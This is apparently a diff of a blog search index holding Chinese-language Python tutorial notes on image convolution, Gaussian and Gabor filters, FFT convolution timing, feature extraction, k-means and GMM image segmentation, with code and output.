    [[-0.125  0.     0.125] [-0.25   0.     0.25 ] [-0.125  0.     0.125]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    jpg

    sum(sum(kernel))
    0.0
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB)) # 太黑了,我乘个 4
    <matplotlib.image.AxesImage at 0x2a11c124520>

    png

    Convolution via Fourier transform is faster

    就是说卷积运算使用了太多的乘法,运用 FFT 算法的思想会加速运算?

    import numpy as np

    arr1 = np.random.random(100000)
    arr2 = np.random.random(100000)
    %%timeit
    np.convolve(arr1, arr2)
    1.66s ± 341ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
    import scipy.signal
    %%timeit
    scipy.signal.fftconvolve(arr1, arr2)
    10.8ms ± 1.24ms per loop (mean ± std. dev. of 7 runs, 100 loops each)

    定义法

    def conv(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    y = [0.0 for i in range(YN)]
    for n in range(YN):
    for m in range(M):
    if 0 <= n - m and n - m < N:
    y[n] += a[n - m] * b[m]
    return y
    conv((1, 2, 3), (4, 5, 6))
    [4.0, 13.0, 28.0, 27.0, 18.0]

    使用 numpy 库

    import numpy as np

    np.convolve((1, 2, 3), (4, 5, 6))
    array([ 4, 13, 28, 27, 18])

    FFT 快速卷积

    def convfft(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    FFT_N = 2 ** (int(np.log2(YN)) + 1)
    afft = np.fft.fft(a, FFT_N)
    bfft = np.fft.fft(b, FFT_N)
    abfft = afft * bfft
    y = np.fft.ifft(abfft).real[:YN]
    return y
    convfft((1, 2, 3), (4, 5, 6))
    array([ 4., 13., 28., 27., 18.])

    对比

    import time
    import matplotlib.pyplot as plt

    def run(func, a, b):
    n = 1
    start = time.perf_counter()
    for j in range(n):
    func(a, b)
    end = time.perf_counter()
    run_time = end - start
    return run_time / n

    n_list = []
    t1_list = []
    t2_list = []
    for i in range(10):
    count = i * 1000 + 10
    print(count)
    a = np.ones(count)
    b = np.ones(count)
    t1 = run(conv, a, b) # 直接卷积
    t2 = run(convfft, a, b) # FFT 卷积
    n_list.append(count)
    t1_list.append(t1)
    t2_list.append(t2)

    # plot
    plt.plot(n_list, t1_list, label='conv')
    plt.plot(n_list, t2_list, label='convfft')
    plt.legend()
    plt.title(u"convolve times")
    plt.ylabel(u"run times(ms/point)")
    plt.xlabel(u"length")
    plt.show()
    10101020103010401050106010701080109010

    png

    ]]>
    + 参考

    正文

    卷积运算

    • 连续卷积:

    $$(f*g)(t):=\int_{-\infty}^{+\infty} f(x)\cdot g(t-x)dx$$

    gif

    • 离散卷积:

    $$\sum_{m=-M}^{M} f[n-m]g[m]$$

    点对点相乘,再相加

    jpg

    使相乘后的数据拥有周边数据的一些特征:

    jpg

    在数字图像处理中的应用

    1
    2
    3
    4
    5
    6
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np

    img = cv2.imread('images/tom_in_bowtie.jpg')
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11b90d760>

    png

    1
    img.shape
    (500, 399, 3)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    def plot(array):
    print(array)
    plt.matshow(array, cmap='Wistia')
    plt.colorbar()
    for x in range(len(array)):
    for y in range(len(array)):
    plt.annotate(round(array[x, y], 3),xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    return plt

    均值滤波

    jpg

    1
    2
    kernel = np.ones((3, 3)) / 9
    plot(kernel)
    [[0.11111111 0.11111111 0.11111111] [0.11111111 0.11111111 0.11111111] [0.11111111 0.11111111 0.11111111]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11c0d0af0>

    png

    高斯模糊

    jpg

    定义高斯卷积核,$\sigma$ 为标准差

    $$G(x,y)=\frac{1}{2\pi\sigma2}\exp\left(-\frac{x2+y2}{2\sigma2}\right)$$

    $$G(x,y)=\frac{1}{2\pi\sigma_x\sigma_y}\exp\left[-\left(\frac{x2}{2\sigma2_x}+\frac{y2}{2\sigma2_y}\right)\right]=\frac{1}{\sqrt{2\pi}\sigma_x}\exp\left(-\frac{x2}{2\sigma2_x}\right)\cdot \frac{1}{\sqrt{2\pi}\sigma_y}\exp\left(-\frac{y2}{2\sigma2_y}\right)=G(x)\cdot G(y)$$

    1
    2
    def gaussian_kernel_2d(ksize, sigma):
    return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize,sigma).T
    1
    2
    kernel = gaussian_kernel_2d(7, -1)
    plot(kernel)
    [[0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797  0.00097656] [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289  0.00341797] [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578  0.00683594] [0.00878906 0.03076172 0.06152344 0.07910156 0.06152344 0.03076172  0.00878906] [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578  0.00683594] [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289  0.00341797] [0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797  0.00097656]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    1
    sum(sum(kernel))
    1.0

    应用高斯滤波

    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2abcbef70>

    png

    等效于

    1
    2
    fimg = cv2.GaussianBlur(img, (7, 7), -1)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2aa6a6910>

    png

    锐化

    1
    2
    3
    4
    kernel = np.array([[-0.5, -1.0, -0.5],
    [-1.0, 7.0, -1.0],
    [-0.5, -1.0, -0.5]])
    plot(kernel)
    [[-0.5 -1.  -0.5] [-1.   7.  -1. ] [-0.5 -1.  -0.5]]0 0 -0.50 1 -1.00 2 -0.51 0 -1.01 1 7.01 2 -1.02 0 -0.52 1 -1.02 2 -0.5<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    1
    sum(sum(kernel))
    1.0
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2a9376fd0>

    png

    边缘检测

    jpg

    1
    2
    3
    4
    5
    # 我也不知道这里为什么第二行显示的都是 0.0...
    kernel = np.array([[-0.125, 0.0, 0.125],
    [-0.25, 0.0, 0.25],
    [-0.125, 0.0, 0.125]])
    plot(kernel)
    [[-0.125  0.     0.125] [-0.25   0.     0.25 ] [-0.125  0.     0.125]]<module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    jpg

    1
    sum(sum(kernel))
    0.0
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB)) # 太黑了,我乘个 4
    <matplotlib.image.AxesImage at 0x2a11c124520>

    png

    Convolution via Fourier transform is faster

    就是说卷积运算使用了太多的乘法,运用 FFT 算法的思想会加速运算?

    1
    2
    3
    4
    import numpy as np

    arr1 = np.random.random(100000)
    arr2 = np.random.random(100000)
    1
    2
    %%timeit
    np.convolve(arr1, arr2)
    1.66s ± 341ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
    1
    import scipy.signal
    1
    2
    %%timeit
    scipy.signal.fftconvolve(arr1, arr2)
    10.8ms ± 1.24ms per loop (mean ± std. dev. of 7 runs, 100 loops each)

    定义法

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def conv(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    y = [0.0 for i in range(YN)]
    for n in range(YN):
    for m in range(M):
    if 0 <= n - m and n - m < N:
    y[n] += a[n - m] * b[m]
    return y
    1
    conv((1, 2, 3), (4, 5, 6))
    [4.0, 13.0, 28.0, 27.0, 18.0]

    使用 numpy 库

    1
    2
    3
    import numpy as np

    np.convolve((1, 2, 3), (4, 5, 6))
    array([ 4, 13, 28, 27, 18])

    FFT 快速卷积

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def convfft(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    FFT_N = 2 ** (int(np.log2(YN)) + 1)
    afft = np.fft.fft(a, FFT_N)
    bfft = np.fft.fft(b, FFT_N)
    abfft = afft * bfft
    y = np.fft.ifft(abfft).real[:YN]
    return y
    1
    convfft((1, 2, 3), (4, 5, 6))
    array([ 4., 13., 28., 27., 18.])

    对比

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    import time
    import matplotlib.pyplot as plt

    def run(func, a, b):
    n = 1
    start = time.perf_counter()
    for j in range(n):
    func(a, b)
    end = time.perf_counter()
    run_time = end - start
    return run_time / n

    n_list = []
    t1_list = []
    t2_list = []
    for i in range(10):
    count = i * 1000 + 10
    print(count)
    a = np.ones(count)
    b = np.ones(count)
    t1 = run(conv, a, b) # 直接卷积
    t2 = run(convfft, a, b) # FFT 卷积
    n_list.append(count)
    t1_list.append(t1)
    t2_list.append(t2)

    # plot
    plt.plot(n_list, t1_list, label='conv')
    plt.plot(n_list, t2_list, label='convfft')
    plt.legend()
    plt.title(u"convolve times")
    plt.ylabel(u"run times(ms/point)")
    plt.xlabel(u"length")
    plt.show()
    10101020103010401050106010701080109010

    png

    ]]>
    @@ -8928,7 +8928,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(55-58)-Supervised%20Learning/ - 正文

    55 - How to read proprietary microscope images into Python

    (给使用显微镜的人看的,略)

    56 - What are features in machine learning

    (听不懂,寄)

    png

    57 - How to generate features in Python for machine learning

    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/scratch.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x181098b9220>

    png

    • 这个图像很难使用传统的直方图方法来分割

    • 使用熵过滤器来分割,像素点越白,表示熵越高

    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(1))
    plt.imshow(entropy_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x1810981b2e0>

    png


    • 但在如下图像中,熵过滤器的效果并不好
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(121)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(122)
    ax2.imshow(entropy_img, cmap='gray')
    ax2.title.set_text('entropy_img')
    plt.show()

    png


    • 使用 Sobel 过滤器
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)

    from skimage.filters import sobel

    sobel_img = sobel(img)

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(132)
    ax2.imshow(gaussian_img, cmap='gray')
    ax2.title.set_text('gaussian_img')

    ax3 = fig.add_subplot(133)
    ax3.imshow(sobel_img, cmap='gray')
    ax3.title.set_text('sobel_img')

    plt.show()

    png


    • 使用 Pandas 统计数据用于机器学习
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    from scipy import ndimage as nd
    from skimage.filters import sobel
    import pandas as pd

    img = cv2.imread('images/Yeast_Cells.png', 0)
    img2 = img.reshape(-1)

    df = pd.DataFrame()
    df['Original Pixel Values'] = img2

    entropy_img = entropy(img, disk(1))
    entropy1 = entropy_img.reshape(-1)
    df['Entropy'] = entropy1

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian1 = gaussian_img.reshape(-1)
    df['Gaussian'] = gaussian1

    sobel_img = sobel(img)
    sobel1 = sobel_img.reshape(-1)
    df['Sobel'] = sobel1

    df
    Original Pixel Values Entropy Gaussian Sobel
    0 123 1.584963 116 0.027311
    1 122 1.500000 113 0.025565
    2 116 2.000000 109 0.032590
    3 114 2.000000 103 0.063612
    4 99 2.000000 97 0.098479
    ... ... ... ... ...
    1048571 111 2.000000 107 0.022570
    1048572 118 2.000000 107 0.007466
    1048573 106 2.000000 108 0.021702
    1048574 109 1.500000 108 0.012783
    1048575 112 1.584963 108 0.005280

    1048576 rows × 4 columns

    58 - What are Gabor filters

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\exp\left[i\left(2\pi\frac{x’}{\lambda}+\psi\right)\right]$$

    • 根据欧拉公式:

    $$e^{ix}=\cos x + i \sin x$$

    • 实数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\cos\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    • 虚数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\sin\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    其中 $x’=x\cos\theta + y\sin \theta$, $y’=-x\sin\theta + y\cos \theta$

    • $\lambda$ represents the wavelength of the sinusoidal factor.

      • $\lambda$表示正弦因子的波长。
    • $\theta$ represents the orientation of the normal to the parallel stripes of a Gabor function.

      • $\theta$表示Gabor函数平行条纹的法线方向。
    • $\psi$ is the phase offset.

      • $\psi$ 为相位偏移量。
    • $\sigma$ is the sigma/standard deviation of the Gaussian envelope.

      • $\sigma$ 为高斯包络线的标准差/标准差。
    • $\gamma$ is the spatial aspect ratio, and specifies the ellipticity of the support of the Gabor function.

      • $\gamma$ 为空间纵横比,表示Gabor函数支持度的椭圆度。越接近 1,越像圆;越接近 0,越像椭圆。
    # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 1 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    plt.imshow(kernel, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c8e8d90>

    png

    img = cv2.imread('images/synthetic.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c966fd0>

    png

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c9bec40>

    png


    通过修改 $\theta$ 的值来使 Gabor 过滤器识别右下斜线。

    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 3 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c697b20>

    png

    ]]>
    + 正文

    55 - How to read proprietary microscope images into Python

    (给使用显微镜的人看的,略)

    56 - What are features in machine learning

    (听不懂,寄)

    png

    57 - How to generate features in Python for machine learning

    1
    2
    3
    4
    5
    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/scratch.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x181098b9220>

    png

    • 这个图像很难使用传统的直方图方法来分割

    • 使用熵过滤器来分割,像素点越白,表示熵越高

    1
    2
    3
    4
    5
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(1))
    plt.imshow(entropy_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x1810981b2e0>

    png


    • 但在如下图像中,熵过滤器的效果并不好
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(121)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(122)
    ax2.imshow(entropy_img, cmap='gray')
    ax2.title.set_text('entropy_img')
    plt.show()

    png


    • 使用 Sobel 过滤器
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)

    from skimage.filters import sobel

    sobel_img = sobel(img)

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(132)
    ax2.imshow(gaussian_img, cmap='gray')
    ax2.title.set_text('gaussian_img')

    ax3 = fig.add_subplot(133)
    ax3.imshow(sobel_img, cmap='gray')
    ax3.title.set_text('sobel_img')

    plt.show()

    png


    • 使用 Pandas 统计数据用于机器学习
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    from scipy import ndimage as nd
    from skimage.filters import sobel
    import pandas as pd

    img = cv2.imread('images/Yeast_Cells.png', 0)
    img2 = img.reshape(-1)

    df = pd.DataFrame()
    df['Original Pixel Values'] = img2

    entropy_img = entropy(img, disk(1))
    entropy1 = entropy_img.reshape(-1)
    df['Entropy'] = entropy1

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian1 = gaussian_img.reshape(-1)
    df['Gaussian'] = gaussian1

    sobel_img = sobel(img)
    sobel1 = sobel_img.reshape(-1)
    df['Sobel'] = sobel1

    df
    Original Pixel Values Entropy Gaussian Sobel
    0 123 1.584963 116 0.027311
    1 122 1.500000 113 0.025565
    2 116 2.000000 109 0.032590
    3 114 2.000000 103 0.063612
    4 99 2.000000 97 0.098479
    ... ... ... ... ...
    1048571 111 2.000000 107 0.022570
    1048572 118 2.000000 107 0.007466
    1048573 106 2.000000 108 0.021702
    1048574 109 1.500000 108 0.012783
    1048575 112 1.584963 108 0.005280

    1048576 rows × 4 columns

    58 - What are Gabor filters

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\exp\left[i\left(2\pi\frac{x’}{\lambda}+\psi\right)\right]$$

    • 根据欧拉公式:

    $$e^{ix}=\cos x + i \sin x$$

    • 实数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\cos\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    • 虚数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\sin\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    其中 $x’=x\cos\theta + y\sin \theta$, $y’=-x\sin\theta + y\cos \theta$

    • $\lambda$ represents the wavelength of the sinusoidal factor.

      • $\lambda$表示正弦因子的波长。
    • $\theta$ represents the orientation of the normal to the parallel stripes of a Gabor function.

      • $\theta$表示Gabor函数平行条纹的法线方向。
    • $\psi$ is the phase offset.

      • $\psi$ 为相位偏移量。
    • $\sigma$ is the sigma/standard deviation of the Gaussian envelope.

      • $\sigma$ 为高斯包络线的标准差/标准差。
    • $\gamma$ is the spatial aspect ratio, and specifies the ellipticity of the support of the Gabor function.

      • $\gamma$ 为空间纵横比,表示Gabor函数支持度的椭圆度。越接近 1,越像圆;越接近 0,越像椭圆。
    1
    # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 1 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    plt.imshow(kernel, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c8e8d90>

    png

    1
    2
    img = cv2.imread('images/synthetic.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c966fd0>

    png

    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c9bec40>

    png


    通过修改 $\theta$ 的值来使 Gabor 过滤器识别右下斜线。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 3 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c697b20>

    png

    ]]>
    @@ -8955,7 +8955,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(50-54)-Unsupervised%20Learning/ - 正文

    50 - What is k-means clustering and how to code it in Python

    import pandas as pd

    df = pd.read_excel('data/K_Means.xlsx')
    df.head()
    X Y
    0 1 42
    1 2 46
    2 3 51
    3 4 20
    4 5 30
    import seaborn as sns
    sns.regplot(x=df['X'], y=df['Y'], fit_reg=False)
    <AxesSubplot:xlabel='X', ylabel='Y'>

    png
    我们知道初始值的选取对结果的影响很大,对初始值选择的改进是很重要的一部分。在所有的改进算法中,K-means++ 最有名。

    K-means++ 算法步骤如下所示:

    1. 随机选取一个中心点 $a_1$;
    2. 计算数据到之前 n 个聚类中心最远的距离 $D(x)$,并以一定概率 $\frac{D(x)^2}{\Sigma D(x)^2}$ 选择新中心点 $a_i$;
    3. 重复第二步。

    ​ 简单的来说,就是 K-means++ 就是选择离已选中心点最远的点。这也比较符合常理,聚类中心当然是互相离得越远越好。

    ​ 但是这个算法的缺点在于,难以并行化。所以 k-means II 改变取样策略,并非按照 k-means++ 那样每次遍历只取样一个样本,而是每次遍历取样 $k$ 个,重复该取样过程 $\log(n)$ 次,则得到 $k\log(n)$ 个样本点组成的集合,然后从这些点中选取 $k$ 个。当然一般也不需要 $\log(n)$ 次取样,5 次即可。

    from sklearn.cluster import KMeans

    kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=300, n_init=10, random_state=0)
    model = kmeans.fit(df)
    predicted_values = kmeans.predict(df)
    from matplotlib import pyplot as plt

    plt.scatter(df['X'], df['Y'], c=predicted_values, s=50, cmap='viridis')
    plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=200, c='black', alpha=0.5)
    <matplotlib.collections.PathCollection at 0x2e8afc39d00>

    png

    51 - Image Segmentation using K-means

    import numpy as np
    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x202a78459d0>

    png

    • 将图像变成一维的
    img2 = img.reshape((-1, 3))
    img2 = np.float32(img2)
    • Now we apply the KMeans function. Before that we need to specify the criteria. My criteria is such that, whenever 10 iterations of algorithm is ran, or an accuracy of epsilon = 1.0 is reached, stop the algorithm and return the answer.

      • 现在我们应用 KMeans 函数。在此之前,我们需要指定标准。我的标准是这样的,每当算法运行 10 次迭代,或达到 epsilon = 1.0 的精度时,停止算法并返回答案。
    • criteria : It is the iteration termination criteria. When this criteria is satisfied, algorithm iteration stops. Actually, it should be a tuple of 3 parameters. They are ( type, max_iter, epsilon ):

      • 它是迭代终止条件。当满足该条件时,算法迭代停止。实际上,它应该是一个包含 3 个参数的元组。

      • type of termination criteria. It has 3 flags as below:

        • cv.TERM_CRITERIA_EPS - stop the algorithm iteration if specified accuracy, epsilon, is reached.
          • 如果达到指定的精度 epsilon,则停止算法迭代。
        • cv.TERM_CRITERIA_MAX_ITER - stop the algorithm after the specified number of iterations, max_iter.
          • 在指定的迭代次数 max_iter 后停止算法。
        • cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER - stop the iteration when any of the above condition is met.
          • 当满足上述任何一个条件时,对迭代进行顶迭代。
      • max_iter - An integer specifying maximum number of iterations.

        • 指定最大迭代次数的整数。
      • epsilon - Required accuracy

        • 所需的精度
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    • Clusters

    • attempts : Flag to specify the number of times the algorithm is executed using different initial labellings. The algorithm returns the labels that yield the best compactness. This compactness is returned as output.

      • 标志指定使用不同初始标记执行算法的次数。该算法返回产生最佳紧凑性的标签。这种紧凑度作为输出返回。
    • flags : This flag is used to specify how initial centers are taken. Normally two flags are used for this : cv.KMEANS_PP_CENTERS and cv.KMEANS_RANDOM_CENTERS.

      • 此标志用于指定如何获取初始中心。通常使用两个标志:cv.KMEANS_PP_CENTERS 和 cv.KMEANS_RANDOM_CENTERS。
    • compactness : It is the sum of squared distance from each point to their corresponding centers.

      • 紧凑度:它是每个点到它们相应中心的距离平方和。
    • labels : This is the label array (same as ‘code’ in previous article) where each element marked ‘0’, ‘1’…

      • 这是标签数组(与上一篇文章中的’code’相同),其中每个元素标记为’0’,‘1’…
    • centers : This is array of centers of clusters.

      • 这是集群中心的数组。
    k = 3
    attempts = 10
    ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
    center = np.uint8(center)
    res = center[label.flatten()]
    • 将数组重新转成原来的形状
    res2 = res.reshape((img.shape))
    • 最终将图像缩减成了只有 3 种颜色

    • Color Quantization is the process of reducing number of colors in an image. One reason to do so is to reduce the memory. Sometimes, some devices may have limitation such that it can produce only limited number of colors. In those cases also, color quantization is performed. Here we use k-means clustering for color quantization.

      • 颜色量化是减少图像中颜色数量的过程。
        这样做的一个原因是减少内存。
        有时,一些设备可能有限制,例如它只能产生有限数量的颜色。
        在这些情况下,还执行颜色量化。
        这里我们使用 k-means 聚类进行颜色量化。
    • There is nothing new to be explained here. There are 3 features, say, R,G,B. So we need to reshape the image to an array of Mx3size (M is number of pixels in image). And after the clustering, we apply centroid values (it is also R,G,B) to all pixels, such that resulting image will have specified number of colors. And again we need to reshape it back to the shape of original image.

      • 这里没有什么新东西要解释的。有三个特征,R,G,B。因此我们需要将图像重塑为 Mx3 大小的数组(M 为图像中的像素数)。在聚类之后,我们对所有像素应用质心值(它也是 R,G,B),这样得到的图像将具有指定数量的颜色。我们需要重新塑造它回到原始图像的形状。
    center
    array([[251, 251, 251],       [151, 151, 151],       [ 47,  47,  47]], dtype=uint8)
    plt.imshow(res2)
    <matplotlib.image.AxesImage at 0x202a83ac2b0>

    png

    52 - What is GMM and how to use it for Image segmentation

    import numpy as np
    import cv2

    img = cv2.imread('images/plant_cells.jpg')
    img2 = img.reshape((-1, 3))
    from sklearn.mixture import GaussianMixture as GMM

    gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
    • 图像被分成 0 和 1 两类
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee043bb4c0>

    png


    import numpy as np
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    img2 = img.reshape((-1, 3))

    from sklearn.mixture import GaussianMixture as GMM

    # 分成 4 类
    gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
